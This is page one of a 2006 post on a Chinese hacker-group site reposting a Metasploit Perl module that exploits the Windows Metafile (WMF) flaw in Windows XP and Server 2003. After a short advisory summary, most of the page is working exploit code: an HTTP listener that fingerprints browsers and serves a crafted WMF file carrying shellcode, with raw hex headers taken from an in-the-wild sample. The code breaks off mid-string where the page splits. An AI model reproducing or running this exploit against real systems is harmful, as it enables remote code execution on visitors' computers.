Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 黑客技术 >> Exploit >> 文章正文	用户登录新用户注册

Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

热

【字体：小大】

Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

作者：佚名文章来源：CnXHacker.Net 点击数：更新时间：2006-10-29

------------------------------------------------------------------------------
名称：Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit
漏洞资料：http://www.microsoft.com/technet/security/advisory/912840.mspx
危险程度：严重
影响范围：
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
Microsoft Windows 98
Microsoft Windows 98 Second Edition (SE)
Microsoft Windows Millennium Edition (ME)
解决办法：尚未见解决办法
相关介绍：http://www.microsoft.com/technet/security/advisory/912840.mspx

------------------------------------------------------------------------------

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::ie_xp_pfv_metafile; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; my $advanced = { }; my $info = { 'Name' => 'Windows XP/2003 Picture and Fax Viewer Metafile Overflow', 'Version' => '$Revision: 1.2 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com' ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a vulnerability in the Windows Picture and Fax Viewer found in Windows XP and 2003. This vulnerability uses a corrupt Windows Metafile to execute arbitrary code and was reported by noemailpls[at]noemail.ziper to the Bugtraq mailing list after being discovered in the wild at the following URL: http://unionseek[DOT]com/d/t1/wmf_exp.htm }), 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winxp', 'win2003' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 5081, 'Keys' => [ '-ws2ord', '-bind' ], }, 'Refs' => [ ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic - Windows XP / Windows 2003' ] ], 'Keys' => [ 'ie' ], 'DisclosureDate' => 'Dec 27 2005', }; sub new { my $class = shift; my $self; $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced, }, @_); return $self; } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp'); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } $self->PrintLine("[*] Waiting for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . "/anything.wmf"); while (defined($client = $server->accept())) { $self->HandleHttpClient(fd => Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my ($fd) = @{{@_}}{qw/fd/}; my $targetIdx = $self->GetVar('TARGET'); my $target = $self->Targets->[$targetIdx]; my $ret = $target->[1]; my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $content; my $rhost; my $rport; my $content; my $targets = { "Windows XP" => [ ], # Automatic "Windows 2003" => [ ], # Automatic }; my $target; my $os; # Read the HTTP command my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10); # Read in the HTTP headers while (my $line = $fd->RecvLine(10)) { my ($var, $val) = split /: /, $line; # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); if ($var eq 'User-Agent') { $os = "Windows 2003" if (!$os and $val =~ /Windows NT 5.2/); $os = "Windows XP" if (!$os and $val =~ /Windows NT 5.1/); $os = "Windows 2000" if (!$os and $val =~ /Windows NT 5.0/); $os = "Windows NT" if (!$os and $val =~ /Windows NT/); $os = "Unknown" if (!$os); } } # Set the remote host information ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); $target = $targets->{$os}; if (! $target) { $self->PrintLine("[*] Unsupported HTTP Client connected from $rhost:$rport using $os"); } my $content = $self->wmf_head . $shellcode . $self->wmf_foot; $self->PrintLine("[*] HTTP Client connected from $rhost:$rport using $os, sending payload..."); # Transmit the HTTP response $fd->Send( "HTTP/1.1 200 OK\r\n" . "Content-Type: text/plain\r\n" . "Content-Length: " . length($content) . "\r\n" . "Connection: close\r\n" . "\r\n" . "$content" ); $fd->Close(); } # Ripped straight from wmf_exp.wmf sub wmf_head { return "\x01\x00\x09\x00\x00\x03\x52\x1f\x00\x00\x06\x00\x3d\x00\x00\x00". "\x00\x00\x11\x00\x00\x00\x26\x06\x0f\x00\x18\x00\xff\xff\xff\xff". "\xff\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x03\x85\x00". "\xd0\x02\x00\x00\x09\x00\x00\x00\x26\x06\x0f\x00\x08\x00\xff\xff". "\xff\xff\x02\x00\x00\x00\x17\x00\x00\x00\x26\x06\x0f\x00\x23\x00". "\xff\xff\xff\xff\x04\x00\x1b\x00\x54\x4e\x50\x50\x14\x00\x20\x00". "\xb8\x00\x32\x06\x00\x00\xff\xff\x4f\x00\x14\x00\x00\x00\x4d\x00". "\x69\x00\x00\x00\x0a\x00\x00\x00\x26\x06\x0f\x00\x0a\x00\x54\x4e". "\x50\x50\x00\x00\x02\x00\xf4\x03\x09\x00\x00\x00\x26\x06\x0f\x00". "\x08\x00\xff\xff\xff\xff\x03\x00\x00\x00\x0f\x00\x00\x00\x26\x06". "\x0f\x00\x14\x00\x54\x4e\x50\x50\x04\x00\x0c\x00\x01\x00\x00\x00". "\x01\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0b\x02\x00\x00". "\x00\x00\x05\x00\x00\x00\x0c\x02\xd0\x02\xc0\x03\x04\x00\x00\x00". "\x04\x01\x0d\x00\x07\x00\x00\x00\xfc\x02\x00\x00\x00\x00\x66\x00". "\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x09\x00\x00\x00\xfa\x02". "\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x22\x00\x04\x00\x00\x00". "\x2d\x01\x01\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x09\x00\x00\x00". "\x1d\x06\x21\x00\xf0\x00\xd0\x02\xc0\x03\x00\x00\x00\x00\x04\x00". "\x00\x00\x2d\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xff\xff". "\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00". "\xf0\x01\x00\x00\x09\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x22\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x10\x00". "\x00\x00\x26\x06\x0f\x00\x16\x00\xff\xff\xff\xff\x00\x00\x47\x00". "\x00\x00\x8f\x02\x00\x00\x11\x01\x00\x00\xc1\x02\x00\x00\x08\x00". "\x00\x00\x26\x06\x0f\x00\x06\x00\xff\xff\xff\xff\x01\x00\x0d\x00". "\x00\x00\xfb\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x01\x17\x00\x00\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00". "\x05\x00\x00\x00\x09\x02\x00\x00\x00\x02\x05\x00\x00\x00\x14\x02". "\x00\x00\x00\x00\x04\x00\x00\x00\x02\x01\x02\x00\x10\x00\x00\x00". "\x26\x06\x09\x00\x16\x00"; } # Ripped straight from wmf_exp.wmf sub wmf_foot { return "\x00\x09\x00\x04\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00". "\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05". "\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18". "\x00\x04\x00\x00\x00\x02\x01\x01\x00\x15\x00\x00\x00\x32\x0a\xa5". "\x01\x2a\x00\x09\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x20". "\x00\x0a\xfb\x08\x00\x0a\x00\x06\x00\x09\x00\x09\x00\x07\x00\x09". "\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02". "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00". "\x8a\x14\x02\x00\x00\x00\x00\x04\x70\x00\x00\x2e\x01\x18\x00\x04". "\x00\x00\x00\x02\x01\x01\x00\x19\x00\x00\x00\x32\x0a\xbb\x01\x2a". "\x00\x0c\x00\x00\x00\x77\x77\x77\x77\x20\x3d\x20\x77\x77\x77\x77". "\x77\x0c\x00\x0c\x00\x07\x00\x0c\x00\x05\x00\x0a\x00\x05\x00\x0c". "\x00\x0c\x00\x07\x00\x0e\x00\x0d\x00\x04\x00\x00\x00\x2e\x01\x01". "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff". "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00". "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00". "\x00\x32\x0a\xbb\x01\xa3\x00\x01\x00\x00\x00\x2d\x00\x06\x00\x04". "\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05". "\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00". "\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02". "\x01\x01\x00\x25\x00\x00\x00\x32\x0a\xbb\x01\xa9\x00\x14\x00\x00". "\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77". "\x77\x77\x77\x77\x20\x05\x00\x0a\x00\x0a\x00\x05\x00\x0a\x00\x05". "\x00\x06\x00\x0a\x00\x08\x00\x09\x00\x05\x00\x0a\x00\x08\x00\x0a". "\x00\x06\x00\x09\x00\x05\x00\x0a\x00\x08\x00\x05\x00\x04\x00\x00". "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00". "\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00". "\x00\x04\xbe\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01". "\x00\x3d\x00\x00\x00\x32\x0a\xd1\x01\x2a\x00\x24\x00\x00\x00\x49". "\x20\x77\x77\x77\x77\x77\x20\x42\x20\x3d\x20\x77\x77\x77\x77\x77". "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77". "\x20\x42\x20\x07\x00\x05\x00\x0b\x00\x0a\x00\x0a\x00\x0a\x00\x09". "\x00\x05\x00\x0c\x00\x05\x00\x0b\x00\x05\x00\x05\x00\x0a\x00\x0a". "\x00\x05\x00\x0a\x00\x05\x00\x06\x00\x0a\x00\x08\x00\x05\x00\x0a". "\x00\x06\x00\x04\x00\x0e\x00\x0b\x00\x05\x00\x0a\x00\x0a\x00\x0a". "\x00\x0a\x00\x0a\x00\x04\x00\x0d\x00\x05\x00\x04\x00\x00\x00\x2e". "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x0</p><p align='center'><b><font color='red'>[1]</font> <a href='/Article/hacker/Exploit/200610/6266_2.html'>[2]</a> <a href='/Article/hacker/Exploit/200610/6266_3.html'>[3]</a> <a href='/Article/hacker/Exploit/200610/6266_4.html'>[4]</a> <a href='/Article/hacker/Exploit/200610/6266_5.html'>[5]</a> <a href='/Article/hacker/Exploit/200610/6266_6.html'>[6]</a> <a href='/Article/hacker/Exploit/200610/6266_2.html'>下一页</a> </b></p> <center></center></td> </tr> <tr> <td class=Article_tdbgall align=right colSpan=2>文章录入：IceRiver 责任编辑：admin </td> </tr> <tr> <td width=5></td> <td width=752><li>上一篇文章： <a class='LinkPrevArticle' href='/Article/hacker/Exploit/200610/6265.html' title='文章标题：Eudora Qualcomm WorldMail “LIST” Command Remote Buffer Overflow Exploit 作者：佚名更新时间：2006-10-29 11:45:15'>Eudora Qualcomm WorldMail “LIST” Command Remote Buffer Overflow Exploit</a></li><BR><li>下一篇文章： <a class='LinkNextArticle' href='/Article/hacker/Exploit/200701/7723.html' title='文章标题：freeFTPd = 1.0.8 “USER” Command Handling Remote Buffer Overflow Exploit 作者：佚名更新时间：2007-1-10 5:21:01'>freeFTPd = 1.0.8 “USER” Command Handling Remote Buffer Overflow Exploit</a></li></td> </tr> <tr class=Article_tdbgall align=right> <td colSpan=2> 【<a href='/Article/Comment.asp?ArticleID=6266' target='_blank'>发表评论</a>】【<a href='/User/User_Favorite.asp?Action=Add&ChannelID=1&InfoID=6266' target='_blank'>加入收藏</a>】【<a href='/Article/SendMail.asp?ArticleID=6266' target='_blank'>告诉好友</a>】【<a href='/Article/Print.asp?ArticleID=6266' target='_blank'>打印此文</a>】【<a href='javascript:window.close();'>关闭窗口</a>】 </td> </tr> </table> <table class=center_tdbgall cellSpacing=0 cellPadding=0 width=760 align=center border=0> <tr> <td class=main_shadow></td> </tr> </table>   <table class=center_tdbgall style="WORD-BREAK: break-all" cellSpacing=0 cellPadding=0 width=760 align=center border=0> <tr> <td class=main_title_282 width="33%"><B>最新热点</B></td> <td width=5 rowSpan=2></td> <td class=main_title_282 width="33%"><B>最新推荐</B></td> <td width=5 rowSpan=2></td> <td class=main_title_282 width="33%"><B>相关文章</B></td> </tr> <tr> <td class=main_tdbg_760 vAlign=top height=100><script language="javascript" src="/Article/JS/Article_Hot3.js"></script></td> <td class=main_tdbg_760 vAlign=top width="33%"><script language="javascript" src="/Article/JS/Article_Elite3.js"></script></td> <td class=main_tdbg_760 vAlign=top width="33%"><a class='LinkArticleCorrelative' href='/Article/safe/other/200709/11050.html' title='文章标题：Microsoft 9月安全公告的摘要作者：佚名更新时间：2007-9-16 5:17:02' target="_self">Microsoft 9月安全公告的摘要</a><br><a class='LinkArticleCorrelative' href='/Article/news/vuls/200709/10896.html' title='文章标题：Asterisk 畸形 MIME 数据时有体远程拒绝服务漏洞作者：佚名更新时间：2007-9-3 14:54:23' target="_self">Asterisk 畸形 MIME 数据时有</a><br><a class='LinkArticleCorrelative' href='/Article/news/trade/200709/10873.html' title='文章标题：奇虎呼吁网民共同举证CNNIC中文上网软件作者：佚名更新时间：2007-9-3 14:51:10' target="_self">奇虎呼吁网民共同举证CNNIC中</a><br><a class='LinkArticleCorrelative' href='/Article/news/trade/200709/10865.html' title='文章标题：奇虎称6大杀毒软件均报CNNIC中文上网为木马作者：佚名更新时间：2007-9-3 14:50:34' target="_self">奇虎称6大杀毒软件均报CNNIC</a><br><a class='LinkArticleCorrelative' href='/Article/news/vuls/200708/10840.html' title='文章标题：Epic Games Unreal有多个远程拒绝服务的安全漏洞作者：佚名更新时间：2007-8-27 14:11:23' target="_self">Epic Games Unreal有多个远程</a><br><a class='LinkArticleCorrelative' href='/Article/news/trade/200708/10833.html' title='文章标题：金山WPS Office 2007意外泄露发布紧急声明作者：佚名更新时间：2007-8-27 14:09:46' target="_self">金山WPS Office 2007意外泄露</a><br><a class='LinkArticleCorrelative' href='/Article/safe/virus/200708/10668.html' title='文章标题：通过MSN传播的IRCBot msnmsg.exe pic.zip 解决方案作者：佚名更新时间：2007-8-9 0:43:34' target="_self">通过MSN传播的IRCBot msnmsg</a><br><a class='LinkArticleCorrelative' href='/Article/news/vuls/200708/10656.html' title='文章标题：Microsoft Windows Calendar ICS 有拒绝服务漏洞作者：佚名更新时间：2007-8-9 0:37:17' target="_self">Microsoft Windows Calendar</a><br><a class='LinkArticleCorrelative' href='/Article/OS/Processes/200708/10519.html' title='文章标题：acropdf - acropdf.dll - DLL文件信息作者：佚名更新时间：2007-8-1 11:21:43' target="_self">acropdf - acropdf.dll - DL</a><br><a class='LinkArticleCorrelative' href='/Article/news/trade/200707/10442.html' title='文章标题：Google Apps对决Office 与微软斗法企业市场作者：佚名更新时间：2007-7-24 1:19:45' target="_self">Google Apps对决Office 与微</a><br></td> </tr> </table> <table class=center_tdbgall cellSpacing=0 cellPadding=0 width=760 align=center border=0> <tr> <td class=main_shadow></td> </tr> </table>   <table class=center_tdbgall style="WORD-BREAK: break-all" cellSpacing=0 cellPadding=0 width=760 align=center border=0> <tr class=main_title_760> <td height=25>　<IMG src="/Images/TEAM.gif" align=absMiddle>　<STRONG>网友评论：</STRONG>（只显示最新5条。评论内容只代表网友观点，与本站立场无关！） </td> </tr> <tr> <td class=main_tdbg_760><script language="javascript" src="/Article/Comment.asp?Action=JS&CommentNum=5&ArticleID=6266"></script> </td> </tr> </table> <table class=center_tdbgall cellSpacing=0 cellPadding=0 width=760 align=center border=0> <tr> <td class=main_shadow></td> </tr> </table>    <TABLE height=22 cellSpacing=0 cellPadding=0 width=760 align=center bgColor=#748FA9 background=/skin/2006/bottomBG.gif border=0> <TBODY> <TR> <TD background=/skin/2006/hbline.gif bgColor=#ffffff colSpan=2 border="0"><IMG height=1 src="/skin/2006/a.gif" width=760></TD> </TR> <TR> <TD width=580 height=22 class=Bottom_Adminlogo> <A class=Bottom href="/info/about.html">关于我们</A> - <A class=Bottom href="/Copyright.asp">版权声明</A> - <A class=Bottom href="/info/HELP.html">帮助(？)</A> - <A class=Bottom href="/info/AxD.html">广告服务</A> - <A class=Bottom href="/info/contact.html">联系我们</A> - <A class=Bottom href="/FriendSite/">友情链接</A> - <A class=Bottom href="/info/userreg.html">用户注册</A> - </TD> <TD width=180 height=22><FONT title="WwW.CnXHacker.CoM IceRiver Studio" style="FONT-SIZE: 10px; FONT-FAMILY: Arial,Sans-serif" color=#333333>Powered by ICE RIVER - STUDIO</FONT> </TD> </TR> <TR> <TD bgColor=#000000 colSpan=2><IMG height=1 src="/skin/2006/a.gif" width=760></TD> </TR> </TBODY> </TABLE> <TABLE height=15 cellSpacing=0 cellPadding=0 width=760 align=center border=0> <TBODY> <TR> <TD align=right width=120 bgColor=#3F4E5C height=15> <FONT style="FONT-SIZE: 10px" color=#ffffff><B>»</B> <A href="#top"><B><FONT face=Verdana,Sans-serif; color=#ffffff>CnXHacker.CoM</FONT></B></A></FONT> </TD> <TD width=15 height=15 align=right valign="top"><IMG height=16 src="/skin/2006/img_bottom.gif" width=40 border=0></TD> <TD width=* height=16 align="center"> <FONT title="中国X黑客小组™ 版权所有© WwW.CnXHacker.CoM" style="FONT-SIZE: 9px; COLOR: #333333" face=Verdana, sans-serif helvetica,arial,>© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. </FONT></TD> <TD align=right> </TD> </TR> </TBODY> </TABLE>  </body> </html><NOSCRIPT><IFRAME src='*' Width='0' Height='0'></IFRAME></NOSCRIPT>